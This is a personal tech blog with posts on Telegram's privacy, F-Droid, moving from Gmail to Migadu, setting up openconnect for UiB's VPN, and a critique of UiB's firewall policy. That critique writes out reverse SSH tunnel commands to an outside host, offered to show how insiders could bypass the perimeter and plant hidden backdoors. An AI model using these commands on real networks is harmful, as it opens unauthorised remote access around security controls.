Sergey Budaev

Aug 26, 2024

Durov, Telegram and responsibility

The founder and head of the Telegram messenger, multimillionaire Pavel Durov, was detained by police immediately after arriving at Le Bourget airport. French law enforcement has long been unhappy with Durov's refusal to moderate content and to cooperate with the authorities in disclosing information about users suspected of distributing drugs, child pornography, fraud and other criminal activity. Moderation on Telegram is nearly nonexistent except in the most severe cases, such as Islamist terrorism, and even then it usually amounts to banning the offending public channels.

However, Telegram did cooperate with Putin's Russian authorities in banning Navalny's "smart voting" tool. Durov's own explanation was that "it is better to ban Navalny than to have Telegram banned in Russia." This is clearly a deceit: a few years earlier, the Russian authorities had demonstrated their inability to block Telegram.

Durov positions himself as a hardcore libertarian protecting all kinds of freedoms, especially the freedom of speech and expression (against the evil state). Many believe this is true, hence the wave of public support: #FreePavel.

Du Rove

The real picture is, however, quite different. Apart from the very extravagant personality of Pavel Durov (many still remember how he threw rouble banknotes from the balcony of his St. Petersburg head office for personal amusement), neither the Telegram platform nor the company in fact has anything in common with protecting liberties. Telegram is quite a standard commercial walled-garden platform whose main aim is to monetize its growing user base. "Privacy" for Telegram is nothing more than a marketing ploy.

Telegram is advertised as "secure" and "private," although from the beginning it was devised as a centralized platform aimed at exclusive control over its users' communication. There is no end-to-end encryption by default. The MTProto protocol used by Telegram is a home-grown design that has never been seriously audited by cryptography experts. The Telegram client is open source (and is even available in a blob-free open source version on F-Droid), but the server is not. So nothing is known about what actually happens with the users' communication data and metadata. This is not a minor thing, because Telegram keeps all the data on its cloud servers for the user's "convenience." This means that all the messages are unencrypted (from Telegram's point of view) and potentially accessible to third parties.

Tellingly, soon after Durov's detention in Paris, bureaucrats from the Russian presidential administration, the ministry of defence and large state-owned corporations were instructed to delete their Telegram communications. No, this won't help if everything is kept on the cloud servers. Telegram has a reputation of being "inaccessible to the FSB" and is therefore widely used by a range of Russian governmental and military users. These people have been reluctant to use the official "safe" and "encrypted" tools with full FSB certification because they believe (quite reasonably) that these are all wiretapped. Telegram is also the common communication tool for the Russian troops attacking Ukraine. Now it is easy to guess how confused and scared they are!

Every user of Telegram is identified with and linked to a mobile number, which is really a mockery of privacy. Participants of the Hong Kong protests were able to verify this: the mobile numbers, and therefore the personal identities, of many of them were easily obtained from the "private" Telegram by the mainland Chinese police. To access the account of most users (two-step authentication is not enabled by default, so there is no password for most users!) the attacker just needs... access to SMS, which is a trivial task for the mobile operator and therefore for law enforcement (or in many cases even for a hacker using social engineering to reissue the SIM card). And the content is not encrypted, except for the "secret chats" that few actually use.

Some years ago, the Russian authorities tried to access the Telegram contents of quite a few members of Putin's opposition by secretly coercing the mobile operators to forward authentication codes sent by SMS. Admins of quite a few Russian and Belarusian opposition chats, and even regular subscribers, were also identified. There exist several OSINT tools that help identify Telegram chatters; some are available to anyone for a moderate price.

Not only the privacy and security, but even the data integrity of Telegram is questionable, as are the company's protocols for dealing with the data. There are rumors that some years ago Durov himself deleted Telegram chats of his personal rivals at will.

Telegram is "free" to users, but running it incurs huge costs. Who pays then? The users actually pay for it with their ever accumulating private data (their privacy), their increasing flock size, traffic and now also paid subscription and the TON cryptocurrency.

Telegram has always been a secretive, non-transparent company. There are rumors that its major investors include Emirati funds whose major beneficiaries are from Russia. Even though Durov usually denies any links with Russia, Telegram very likely depends significantly on Russian oligarchs' money. Little is known about the financial affairs of Telegram, and little is known about its organizational structure. Nonetheless, everything looks as if a single person--the CEO Pavel Durov--has complete control over everything, from technology to HR, finances and relations with investors.

It looks like Durov has created a platform advertised for "freedom" and "privacy," inviting everyone for whatever purposes, even the most evil and criminal ones. But Telegram was deliberately created as a single centralized platform, apparently to profit from full control. Full control, however, entails full responsibility, including law enforcement access and moderation.

"Guardians of internet freedoms" say that accusing Durov of complicity in crimes the users do is equal to accusing the manufacturer of a hammer: everyone can use it for nailing as well as for killing, all outside of the maker's control or even knowledge. But this is not true. In the case of Telegram, the instrument is not given to the users. Users do not possess it. They are just allowed to hold it for a while. Durov's situation is equivalent to renting out a hammer for securing profits, without asking if it is actually used for nailing or killing. And even knowing that in many cases it is in fact used for killing, breaking into houses and other criminal purposes. The purpose is profit. Then, those who rent out the hammer are responsible for what their paying users do with it. Any benefits obtained from criminal abuse of the hammer are complicity, even if indirect.

The only way to protect liberties and the freedom of speech and expression is through decentralized or federated platforms. There, the end user is the owner of the decentralized unit and bears full responsibility for his or her own use. Decentralized technology is not only safer and more secure, but also more responsible.

Apr 15, 2024

Use F-Droid instead of the Google Play Store

Google's Android Play Store is getting worse over time. It is increasingly littered with useless apps whose sole aim is to display ads. In the name of "privacy," Google introduces ever more obstacles for both developers and users, while genuine malware flourishes on the platform. It often becomes a nightmare for developers of open source software focused on privacy and security. The recent delisting of Snikket--a secure, privacy-centred messaging app--shows that the staff responsible for app review at Google are complete idiots. Check out the whole story here: https://snikket.org/blog/snikket-google-play-removal/.

Google, is it that employees with an IQ below 50 cost less? Or have all the humans at Google been replaced by an AI that lacks intelligence? Many developers give up struggling with the idiots in Google's app review and stop distributing their apps in the Play Store (here is another example).

The situation can be so absurd that the open source Conversations app, which is not free of charge (NOK 47) on Google Play, had to degrade its functionality on that distribution platform. The very same app is available for free, with full functionality, on F-Droid.

But there is a solution for all Android users: just install F-Droid, an app store that publishes open source software without ads, tracking, data leaks, malware or backdoors.

The only guarantee against malicious software is open source code that anyone can inspect and audit: many eyes spot problems earlier and better. F-Droid implements "reproducible builds," which ensure that the binary apk blob is built from exactly the source code the developer has published, so there are no unauthorized additions or modifications (apks from Google Play include Google's blobs for ads and tracking); see the sketch below. It is advisable to look for an app on F-Droid first and go to Google Play only when it is not available there. Google Play should then be used only for apps that are trusted in advance, e.g. your bank's app.
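The idea behind a reproducible-build check can be sketched in a couple of shell commands (an illustration only: the file names are made up, and the real F-Droid verification infrastructure automates this, including stripping the signature blocks before comparison):

# Build the apk yourself from the published source tree, then compare
# digests with the apk that F-Droid distributes: a reproducible build
# must match bit for bit.
sha256sum my-local-build.apk downloaded-from-fdroid.apk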

Apr 22, 2022

Goodbye Gmail

Good old email remains the most critical digital communication tool. What makes the venerable email so useful and sustainable over such a long time is its openness and standardization. Email is radically different from the modern "apps," which integrate all pieces of the technology--the server, the client, and the protocol--under a single monopolist provider. With email, we are free to choose the server (provider) and the client in any combination. This provides enormous flexibility and added privacy and security. Indeed, the provider does not control my client and cannot add backdoors, and there is no monoculture of client software with all the related security risks (where any security vulnerability is global). Email is one of the few pieces of technology that is very resistant to internet censorship. A repressive state can easily block a web site and even force an app store to remove an app (as with Navalny's "Smart Voting"); an app store can also delete it for any other bizarre reason. But it is much more difficult to block a mailing list: it is easy to redeploy and recreate it on a different server (without the users even noticing). Furthermore, the user can easily create several different email-based identities (e.g. a separate one for politically sensitive activity), which adds anonymity. And anonymity means physical security in some countries.

It is not surprising that many internet services use the email address to register users, authenticate them, restore passwords and for other similar purposes. Open, standardized and decentralized email is one of the most critical technologies everything else depends on. After all, the flexibility offered by the email technology--the freedom to choose all the pieces (provider, client etc.)--is just very handy, at least for an advanced user (you can add new features on top of what the provider offers, even against the provider's will--isn't that convenient?).

The whole email technology is built around open protocols rather than a centralized platform. This facilitates competition, makes for better and fairer service and reduces the possible impact of malicious monopolists (Masnick, 2019).

Google's Gmail has long been one of the main pillars of email, one that millions rely upon every day. We should praise Google for popularising email as a basic mainstream technology among the masses. I started using Gmail many years ago when it was in "beta" and available only by invitation. At that time Gmail's openness and unrestricted nature was just blazing. The web interface was lightweight and not cluttered with ugly banners, unlike those of other email providers. There were ads, but they were small and unobtrusive. Gmail had long supported all the basic protocols (POP, IMAP, SMTP), which allowed the use of any standards-compliant client software, and that was available for free (some other providers were greedier and allowed this only on paid plans). Google's POP, IMAP and SMTP implementations have been (and still remain!) quite idiosyncratic, incomplete and not really standards-compliant, which caused various glitches (e.g. message deletion and default sorting are weird, and I always hated Gmail's labels). But this was bearable.

Then there are the serious privacy problems and threats of Gmail, such as the scanning of user email for context-specific advertising (until 2017) or the AI tools that could provide third-party developers with access to some pieces of the data. That is nearly a disaster that cannot be fixed, because spying on the user's data is at the heart of Google's business model. But who cares as long as it is free! I have long been using and promoting PGP encryption, which could fix many of the privacy (and security) problems. Yes, PGP is crucial for individuals and businesses, and yes, a motivated user can encrypt.

Gmail still remained free and relatively open, while the alternative of deploying a private email server is time-consuming and tedious (e.g. ensuring that emails from a tiny private server don't end up in the spam folders of the intended recipients). I used to pay with some of my privacy to get the usability and stability of Gmail.

But over time I became increasingly concerned about the clear trend at Google to make the open email more and more difficult to use outside of the Google monopolistic ecosystem. There are signs of the famous embrace, extend, and extinguish strategy. The Gmail API is featureful and powerful... but only if you really need the complexity and like to play by Google's rules. If you don't like to see ads, for example, and therefore use a standard IMAP mail client of your choice, you must suffer. If you need full PGP support on a mobile client, never offered by Google, you are out of luck and have to use an IMAP-based mobile app like Android K-9 Mail, which requires sacrificing some usability.

Google tends to draw its users by all means into its browser and its own apps and APIs, to get more of the user's private data and show ads. For that matter, Google's security usability has become just terrible. The intrusive access blocks when a mobile user with an IMAP client moves across IP addresses can drive anyone crazy... Access can be blocked even if the user merely switches to the next IP address within the same provider's IP pool.

Google security alert

I have to use VPN with fixed IP address to avoid these stupid blocks!

To help keep your account secure, Google will no longer support the use of third-party apps or devices which ask you to sign in to your Google Account using only your username and password. Instead, you’ll need to sign in using Sign in with Google.

Google's insistence on the rather complicated and heavyweight OAuth2 mechanism for basic email client access (remember, most email programs do not require you to enter your password every time, diminishing the risk of phishing) is understandable only as a means to limit all uncontrollable third-party clients. Yes, OAuth2 is logical for complex workflows of data access delegation across multiple web-based services with different login/password combinations (the "Auth" stands for authorization, not authentication). But whenever I need access to my own emails, I authenticate my own identity and grant full access. And isn't the OAuth2 client secret kept on the device just like the username/password combination? Limiting the (power) users' access to their own data provides just an illusion of security at a large cost to usability and compatibility.

Google's move to OAuth2 authorization seems to imply that the Gmail-hosted emails do not belong to me any more. My emails are now owned by Google, which just "authorizes" (delegates) me access to some of the data, without trusting me. This is not what I need from my private communication. Does Google pretend to "zero-trust" any third-party app? Maybe it doesn't trust its users (the owners of their data), assuming they are all idiots?

If you think your users are idiots, only idiots will use it [your service]. --- Linus Torvalds

And there is another side effect: as Google deployed more and more heavyweight frameworks and technologies, Gmail became very sluggish and bloated. It is cluttered and confusing, especially to those who don't use it often enough to remember all the idiosyncrasies. And it is still poorly adaptable to the user's needs. How can I get a fixed-width font for my plain-text message? Where is my favourite basic (and very fast) HTML web interface?

Enough is enough. I am now leaving Gmail, primarily not because of the big privacy concerns (which are quite expected) but because of deteriorating usability and growing incompatibility. It looks like the people at Google have forgotten their old motto "Don't be evil." While in the past I paid Google in my privacy currency to get functionality and usability, the benefits of Gmail have steadily declined and have now reached an unprofitable level.

Migadu is my choice

There are many hosted email providers, some focused on privacy and security. For example, Protonmail is a fantastic project that makes it nearly trivial to use PGP even for the uninitiated. But its drawbacks are that it is non-standard and has too high a profile, making it quite undesirable in certain authoritarian countries. Simply said, if you use Protonmail in some countries you may fall under suspicion; Protonmail can be blocked by the authorities and, worse still, blocked in quite an idiosyncratic way. Some services may also reject registrations coming from it.

What I finally chose is Migadu. It is not yet another standard email hosting provider; it is a domain-based service. Once you have your own domain name (domains are now cheap), you can make your own email service for your domain. That simple. This makes it super useful for companies, families, groups and NGOs without large budgets. For a reasonable price you get nearly your own mail server with many configurable features (any custom mailboxes, aliases, forwarding, regexp, webmail, etc.) but without the need to maintain all this complex system yourself.

If you have a web site, you necessarily have a domain name for it, so it is now easy to get your own email identity. True, some hosting providers also host email. But if you decide to switch to a different hosting provider, it will create trouble: you need to move the email as well, and this fact strongly limits your next choice. Having a completely independent email system for your existing domain avoids such hoster lock-in and makes life much easier.

By the way, the standard Migadu webmail interface is sleek and very simple. It looks modern but lightweight, and it is quite fast. No bloat whatsoever, only the most crucial functionality. I am not a big fan of web-based email, but I use it from time to time. And there is even some very basic support for PGP! (But remember that web-based PGP is not a very secure solution.)

I found the mail server configuration (including the more esoteric stuff like DNS setup and DKIM signatures) very easy; a sketch of the kind of DNS records involved is shown below. In my view you do not need an IT degree to configure your email service with full functionality. I like the admin panel: it is minimalist and easy to use, with no stupid and distracting visual effects. And Migadu is advertised as a fully open, standards-compliant service without proprietary glitches and limitations, so any standard (open source or closed source) software is very likely to be fully usable. This freedom is very important. And they are also clear and honest about the limitations and drawbacks.
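For illustration, the DNS side of such a setup boils down to a handful of records like these (a sketch only: example.org is a placeholder, and the actual host names, SPF include and DKIM keys must be taken from the Migadu admin panel):

example.org.                  MX     10 aspmx1.migadu.com.    ; primary inbound server
example.org.                  MX     20 aspmx2.migadu.com.    ; backup server
example.org.                  TXT    "v=spf1 include:spf.migadu.com -all"
key1._domainkey.example.org.  CNAME  key1.example.org._domainkey.migadu.com.
_dmarc.example.org.           TXT    "v=DMARC1; p=quarantine;"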

Finally, goodbye Gmail.


PS: Disclaimer: I have no links with Migadu.

This post is also published on Substack and Medium

Nov 10, 2021

How to use open source openconnect for UiB VPN

Cisco AnyConnect is unethical software. First, it is proprietary and closed source, although the nature of its functioning makes it capable of controlling all the user's network traffic. Even worse, Cisco AnyConnect implements controversial functionality making it technically a kind of malware: the so-called "posture" (HostScan) service scans the user's device and sends (steals?) various information out (Cisco says this is done "to improve security," e.g. to avoid non-certified and unauthorized devices), and the Cisco VPN client can officially download and install a spyware trojan on the user's device (Cisco also advertises the trojan as a tool to "improve security"). Also, the VPN client can rearrange the network settings in arbitrary ways without the user's consent and knowledge. All this is a serious security and privacy threat. (And Cisco products have a bad history of serious security flaws that look like backdoors.)

It can be justified to run Cisco AnyConnect on a corporate-owned machine (understanding the consequences for the user's privacy and security). But installing it on the user's own private devices should be avoided.

Openconnect

Openconnect is an open source SSL VPN client that supports several protocols, including Cisco AnyConnect. It can be used as an alternative to the proprietary Cisco software, which may in some installations include controversial and undesirable functions such as uncontrollable network re-routing, a proprietary scanning module, an installable spyware trojan etc.

For more information go to the Openconnect web site: https://www.infradead.org/openconnect/.

Install openconnect from the standard Linux repository, e.g. in case of Ubuntu/Debian use:

apt install openconnect network-manager-openconnect \
            network-manager-openconnect-gnome

Server settings

To set up the VPN, go to the network configuration, add a new VPN connection, and choose Cisco AnyConnect Compatible VPN (openconnect) in the list.

To connect to the UiB VPN one needs this:

  • Server gateway: vpn3.uib.no
  • UiB username (short name, in the following examples zzz000)

Basic connect using command line

The simplest command for connecting to the UiB network is:

sudo openconnect --user zzz000 vpn3.uib.no

Note that sudo is required to set up the tun device (it is, however, possible to configure openconnect to run as an unprivileged user, see http://www.infradead.org/openconnect/nonroot.html).

There are also a few useful options:

  • --background run openconnect in the background
  • --syslog send messages to the system log
  • --pid-file /var/run/openconnect.pid use a specific pid file; the background vpn is then easy to switch off with kill $(cat /var/run/openconnect.pid)

These options result in this command:

sudo openconnect --background --syslog --pid-file /var/run/openconnect.pid  \
                 --user zzz000 vpn3.uib.no

running on terminal

Connect using graphical user interface

Most Linux desktop environments (e.g. GNOME, Xfce etc.) have a graphical network utility that is accessible in the system tray. To configure it use:

  • VPN protocol: Cisco AnyConnect
  • Software token authentication: TOTP

GUI step 1

Other options should be left intact.

At login, the GUI program will ask for the university user name and password. Enter them and press Login.

GUI step 2

Then a Microsoft authentication code will be sent via SMS to the mobile phone.

GUI step 3

There may be a caveat: DNS might not work with the default configuration (web sites are inaccessible by their host names). If this is the case, go to the IPv4 settings and manually configure DNS servers, such as Google DNS 8.8.8.8 and 8.8.4.4

GUI step 4

and then to the IPv6 settings and enter DNS servers manually, e.g. Google DNS 2001:4860:4860::8888, 2001:4860:4860::8844 (the command-line equivalent is sketched below)

GUI step 4
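The same DNS override can also be applied from the command line via NetworkManager's nmcli; a sketch, assuming the VPN connection was saved under the (hypothetical) name "UiB VPN":

nmcli connection modify "UiB VPN" ipv4.dns "8.8.8.8 8.8.4.4" ipv4.ignore-auto-dns yes
nmcli connection modify "UiB VPN" ipv6.dns "2001:4860:4860::8888 2001:4860:4860::8844" ipv6.ignore-auto-dns yes
nmcli connection up "UiB VPN"    # re-activate so the new DNS settings take effect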

Now the UiB VPN should work in a private way. Openconnect turns out to be a useful tool for connecting to the UiB network in a simple and straightforward manner.

Microsoft Windows

Openconnect also works on Microsoft Windows. If you are using Chocolatey, there is a port that can be installed using this command:

choco install openconnect-gui

Disclaimer: I did not try it.


Oct 25, 2021

Are we going to work in a paper jail?

Main points

  • Any major university IT infrastructure is huge and heterogeneous; it is used by lots of people, many of whom are experimenters and explorers who like a challenge, rather than office robots. Most users are busy, focused on research and study, and hate additional (and especially sudden) hassle. This is why consideration of the usability cost is absolutely critical for an IT security strategy.

  • Creating a walled "trusted" area behind a firewall--the perimeter model--is an outdated approach to security in the age of universal zero-trust deployment. Instead of following an already outdated approach, a more sensible strategy is to start implementing components of the zero-trust model, including score-based trust and wide use of personal identity hardware tokens.

  • The major focus in security should be shifted from technology components alone to the end users, creating incentives to use more secure technology rather than adding hassle.

The great firewall

There has been a very rapid trend towards increasingly restrictive IT policies at the University of Bergen, implemented from October this year. While the aim of "increasing security" is laudable, I think the planning and implementation of the policies has several flaws which may compromise the declared aim. The biggest problem is that the UiB IT infrastructure is huge and heterogeneous. There is a variety of services with different levels of security risk and many users with diverse needs, use cases, environments, competences, personal backgrounds and personalities. This requires a more sensible, flexible and inclusive approach. If this is not the case, rigid policies will not make the IT environment significantly safer. Instead, they may hamper normal work for some users and, in the long run, compromise both security and privacy, contrary to the declared aim.

Security, including computer security, is not a fixed state; it is a continuous process. Security is not limited solely to the IT technology: technology alone cannot bring security. Security is primarily a human rather than a technical problem. Indeed, most dangerous security breaches did not target encryption algorithms, and many only partly involved the exploitation of software and hardware vulnerabilities. They typically make use of human factors, such as social engineering, trust exploitation, human mistakes and so on. Successfully tracking and catching cyber criminals likewise often depends not primarily on technology, but on exploiting human errors, negligence, laziness and other similar factors. This is why the current primary focus on merely technological restriction of the IT environment, aimed at little more than its isolation from outside networks, is neither sufficient nor efficient. A more balanced, flexible and holistic approach is needed.

Security can only work in balance with usability. Moreover, there is often a trade-off: technological security restrictions often make for worse usability. A completely "sealed" environment would be just too restricted to be usable. Usability is indeed a primary factor: research shows that many security problems and users' hesitance or unwillingness to make use of (more) secure tools are caused by their imperfect usability. Furthermore, within a hugely heterogeneous environment there is no single optimal balance between security and usability. An important consequence of this is that a flexible and inclusive approach to security, aimed at different degrees of balance with usability, is important.

The technical part of security should start from, and primarily respond to, specific threat model(s), not theoretical or vaguely possible risks. And the threat model(s) should be connected with real-life statistics, e.g. how many breach attempts usually occur, against which of the services, from which IP addresses etc. It does not make sense to install solid steel screens on all the windows of our department building to make it "more secure" against any kind of possible breach; even if there are crowds of hungry zombies walking outside, it is enough to protect the first floor.

The blanket, unconditional restriction of the UiB IT network environment as is being implemented does not seem to respond to any specific consideration of threat model(s), the variety of users, needs, sub-environments etc. It looks like a desperate attempt to seal everything in the hope that a jailed environment, isolated from the outside, will be more secure. This is a wrong assumption.

Some specific problems

Multi-factor authentication via TOTP: Not a panacea.

KI 0780 introduced a multi-factor authentication policy. This is generally a crucial component of improved security, if implemented sensibly. However, not all implementations automatically improve security or provide a sufficient balance between security and usability. What is called "multi-factor authentication" may not even be really multi-factor. The definition of multi-factor authentication involves the use of several things for authentication: typically something you know (a password), plus something you own (e.g. a mobile device or SIM) and something you are (e.g. a fingerprint). If the password is entered using password manager software on the mobile device and the "multi-factor" SMS comes to the same mobile device (or the password is entered and the SMS read on the same computer that links to the smartphone, as is now the norm within the Apple ecosystem), the whole idea of two factors is ridiculed: the smartphone becomes the single authentication device. It can at best be called "two-step authentication," a weaker mechanism.

SMS (and anything based on a phone line or phone number) is actually one of the poorest authentication means due to the long-known and essentially unsolvable vulnerabilities in GSM, SS7 and other related protocols. SMS can be hijacked by malicious smartphone apps (e.g. the Google Play store does not even approach 100% safety; there are occasional scandals with malware in apps with very substantial audiences) or even by basic GSM dumb phones (there are reports of quite a few Chinese-made GSM button phones having factory-installed malware). Worse still, some of the modern and widespread multi-factor mechanisms, such as push-based popups, are also easily exploited (and they encourage the bad habit of clicking "approve" without thinking).

If authentication is done on a web page, it is usual to save an authentication cookie to avoid repeated two-factor invocation. However, cookies are not necessarily secure: long-kept cookies might be hijacked by malware, there is the well-known mechanism of CSRF attacks, and there is also a big privacy drawback (e.g. tracking). The current industry trend is to move away from the cookie mechanism in the mainstream browsers (e.g. Google Chrome will not allow any third-party cookies from 2022). A sensible user policy is to reduce the lifetime of any cookie. However, that makes the "two-step" authentication as currently implemented at UiB a hassle: the user then has to go through the SMS code process nearly every time he or she logs in, even from the same IP address and the same device.

The ssh access to the login.uib.no server has apparently had the best-practice secure mechanism of ssh-key authentication disabled (incidentally, if the key is protected with a passphrase, it is actually two-factor authentication in itself!) and forces the potentially weak password-based mechanism with an SMS code. There seem to be no TOTP mechanisms other than SMS at the time of writing!

A better mechanism is to use a time-based one-time password (TOTP) authenticator application on the mobile phone. This is in fact recommended on the Microsoft and UiB web pages as a more secure alternative (via the Microsoft authenticator app). While TOTP is better than SMS, it is far from perfect, because it is potentially vulnerable to phishing and MITM attacks, and the secret seed must be kept in the authenticator application as well as on the server to make synchronised generation of TOTPs possible.
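The mechanics are easy to demonstrate with the oathtool utility, available in most distro repositories; both sides derive the same short-lived code from the shared seed and the current 30-second time window (the base32 seed below is a made-up example):

oathtool --totp -b JBSWY3DPEHPK3PXP    # prints the 6-digit code for the current window

This shared-seed design is also why a leak of the server-side seed database compromises all users at once.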

Personal hardware tokens

There is a much better and stronger two-factor authentication mechanism: U2F and FIDO2/WebAuthn, which use a hardware security device keeping the private key. The security token, in the form of a small USB or NFC key, can both authenticate to the server and authenticate the server itself with strong asymmetric crypto, making phishing and many other attacks virtually impossible. Many such devices also implement biometric (e.g. fingerprint) identification in a privacy-respecting way (e.g. biometric data is never sent from the user's device). This is now a mature technology that is implemented in all major web browsers and can be used with ssh key-based authentication, GPG-enabled email etc.
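As an example, recent OpenSSH (8.2 and later) can generate key pairs backed by such a token directly; a minimal sketch:

# Generate an ssh key pair whose private part lives on the FIDO2 token;
# the file written to disk is only a stub referencing the hardware key.
ssh-keygen -t ed25519-sk -f ~/.ssh/id_ed25519_sk
# Every subsequent login requires both the stub file and a physical
# touch of the token.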

The best known hardware token is probably the YubiKey, and there are a few others on the market (e.g. Google Titan, FEITIAN, Token2, Thetis etc.). They are not very cheap, but not prohibitively expensive either.

VPN needed for all, even the most essential everyday services

The UiB IT services previously offered several open and industry-standard VPN mechanisms (IPsec, OpenVPN), so that different users could easily find a solution working for them individually. Now there is a single closed and proprietary mechanism: Cisco AnyConnect, comprising both a unique (SSL-based) protocol and the software client. This mechanism may work for many but not necessarily for everyone (e.g. unlike open solutions, it may not be available on some computing platforms; some enthusiasts of open source might find the restriction to a single proprietary tool unethical, etc.). There are rumors about unreliable connections with Cisco AnyConnect, and that OpenVPN was previously more stable for some users. This is indeed likely if Cisco AnyConnect is used in certain restrictive environments with DPI that block connections to certain ports or UDP traffic even on port 443, or that otherwise censor VPNs (e.g. some public WiFi networks have such limitations). OpenVPN, in contrast, can be wrapped to mimic normal SSL web traffic (e.g. with shadowsocks) and work even under the Great Chinese Firewall. There is a clear benefit, at a not prohibitively high cost, in providing at least some limited support for such a mechanism for certain users (e.g. with special needs or during travel). It might even be provided only on special request with some substantiation. Also, the reliability statistics internally used by the IT department might be biased if not all users report minor and transient VPN issues. So there is a case for deploying and supporting alternative VPN solutions, perhaps on a smaller scale.

It sounds quite reasonable that providing and supporting a wider choice of VPN solutions for a minority of users would not be economically feasible. However, this is certainly not the case when just about all services become available only from within the UiB internal network jail. Then there should be more flexibility and inclusion: several ways for a variety of users in different environments to get into the jailed environment comfortably. It is just too unbalanced a limitation to mandate the use of a single restricted VPN to get email from home or from an airport, for example. A better alternative, of course, is to relax the policy, moving at least the most essential but inherently secure services out of the jail.

Is the universal jail really essential for everything?

One issue with unconditionally moving all the UiB IT services into a jailed environment is that this does not reflect a sufficient balance between security and usability. It is of course good to keep potentially less secure services (e.g. RDP) jailed. But are the real threats substantial enough to hide just everything in such a jail?

Are there any real-life statistical or other data showing that accessing the university email system from an IMAP client with normal SSL/TLS protection can be dangerous? The user in such a case does not need to enter the UiB password at login (it is saved in the software, often encrypted on the device), so the phishing risk is near zero. The authenticity of the IMAP server certificate is checked through the standard SSL mechanism. So is there any real security advantage in moving such an essential everyday tool as email into the jail, or does this just add another hurdle?

Another example is connecting to the UiB login.uib.no ssh server. Many (presumably less advanced) users use ssh with their default password. For them, the "two-factor" authentication is of course a serious security improvement, even if it is in fact used in the weakened two-step mode. However, other users can configure ssh-key authentication, which is a much more secure mechanism. Will manual password entry with two-factor authentication really provide a sufficient security improvement in such a case? Will it provide anything beyond a negligible effect if the user has already authenticated with SMS on the same device, or on a different device from the same IP address, shortly before? Is there any improvement in security that justifies such degradation of usability?

The question is this: is the same level of restriction and jailing really essential for all services--often and rarely used, potentially less secure and highly secure, easy and difficult to exploit, those with documented attacks and those that present little interest to intruders? Doesn't it just impose usability costs not balanced by any security improvement?

Human ingenuity: Is the jail actually made of paper?

It is clear that equally and unconditionally restricting just everything, especially without considering the usability costs, will not automatically increase security. The situation can well become worse: lower security as well as compromised privacy.

For example, to avoid all the nuisance, users may switch to third-party commercial providers, e.g. increasingly use private gmail.com accounts, Dropbox etc. Users may turn to smaller, more cryptic online tools and applications (e.g. file sharing sites and communication tools, some advertised as encrypted) with uncontrollable and unknown security. Some of them might be owned and run by communities and volunteers; some could be compromised or deliberately devised to gather data, track users and spy.

Some of the more qualified "insider" users might successfully hack the system to get nuisance-free access to the UiB jailed environment from outside. It is actually not a hard problem. One possible solution is to use a reverse ssh proxy, as the sketch below shows. It does not even require administrative rights and can be done by a motivated average-level computer user after 20 minutes of reading the ssh manual. More advanced users can create stable backdoors implementing such things as proxy jump and port forwarding that will survive reboots, logouts etc. It is also easy to add various layers of plausible deniability and obfuscation.
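To illustrate how low the bar is, the following is essentially the whole trick (a sketch with hypothetical host names, quoted to make the point, not as a recipe):

# Run inside the jailed network: keep a reverse tunnel open to a
# machine outside, exposing the local ssh port there.
ssh -N -R 2222:localhost:22 user@outside.example.org

# Run later on outside.example.org: enter the jailed machine through
# the tunnel, bypassing the perimeter firewall entirely.
ssh -p 2222 user@localhost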

There are many more tools, ways and possibilities to implant and efficiently hide a backdoor in the UiB jailed environment. All that is required is various open source components freely available on the net and an incentive to perform such unauthorized actions. This is not just an abstract theoretical threat but a real and serious risk left behind by the current jailing policy.

Imposing a jailed environment without considering the trade-off with flexibility and usability has this biggest problem: it may create an incentive to break the rules to make life more hassle-free. A related and serious problem is that the IT department would not be able to control this and in most cases will remain unaware of the issue. It is virtually impossible to detect that users communicate and share sensitive medical or personal data over a private Google mail account, for example. A cryptic backdoor implanted on a computer within the UiB jail with sufficient plausible deniability can remain undetected for a long time without costly and tedious forensic analysis. But such an analysis will be conducted only by the police, after a catastrophic break-in has occurred--too late.

There are many advanced users and smart students at the university. Many understand well (and they do discuss!) the inconsistency of the restrictive jail policies. Some people may find it quite fun to overcome silly rules that impose unneeded hassle. It can indeed be an interesting challenge but, unfortunately, also an additional incentive.

A further problem is that many users usually do not bother to report smaller or transient problems through the normal issue tracking channels such as hjelp.uib.no. They may not be acquainted with them, or just consider reporting a hassle when they are very busy (and they are very busy with real things, too busy to hang on tangential IT problems). A quite typical course of action is to ask someone nearby for help or a workaround. Therefore, if the knowledge of the ways of implanting backdoors--and of the obvious fact that it is quite easy and just solves the problem--spreads among the students and staff, it can create a real security disaster. Unfortunately, backdoor skills are very likely to spread if the IT department continues to build a more and more restrictive jail and provide more incentives to break the rules. Then it would become essential to tighten the jail further: inspect all devices on entry and refuse entry to everyone with an IQ above 60. The simple fact is that the jail that is being so happily built is not made of rock and steel; it is made of paper.

The situation at UiB is quite different from that of a typical commercial organization upon which the standard security recipes are based. There are many brilliant students and staff out here; many are young and like challenges. There can be those who would not hesitate to take the risk, given that the benefit of making one's own hassle-free environment is high, the cost is zero, and the expected risk is rather low. Making a backdoor is also a fun way of learning technology--another added incentive. Many folks are already aware of various software tools and know how to use their black magic. People are ingenious, and people at UiB are on average much more ingenious than outside. What is the threat model behind the jailed IT environment? Is it to protect UiB from outside hackers? It is a wrong model, because many such hackers are already within the jailed environment and are ready to take up the challenge of punching its feeble paper walls from the inside.

What should be done?

The inconsiderate and inflexible jailing of the UiB IT networks should certainly be slowed down before it is too late and people start using third-party tools and making their own unauthorized solutions. There should be a serious analysis of what must be implemented and over which time scale, so the users can get acquainted with it and are not suddenly hit with huge hassle. As of now, the "analysis" seems to be mainly focused on "what suddenly breaks down once we put everything into a jail"; this is not acceptable. The policies should not be based mechanistically on some manual made for a different type of environment; they should be inclusive and flexible enough to adapt to the complex, diverse and heterogeneous UiB environment. The main focus should switch from technology to people: how to reach most of them (they are busy!), make security improvements minimally obtrusive, and teach very busy people sufficient security skills without much hassle. Specifically, the most important information should not be sent via a global mailing list that may disappear in the user's mail filter, but must be directed personally to each user (it isn't prohibitively hard to write a script for this, substituting %NAME% with the real user's name--see the sketch below).
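Something along these lines would do (a sketch: the template file, the user list format and the mail command are all illustrative):

#!/bin/sh
# Send a personalised copy of message.txt to every user listed in
# users.tsv (two tab-separated columns: full name, email address).
while IFS="$(printf '\t')" read -r name email; do
    sed "s/%NAME%/${name}/g" message.txt | mail -s "Important IT change" "${email}"
done < users.tsv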

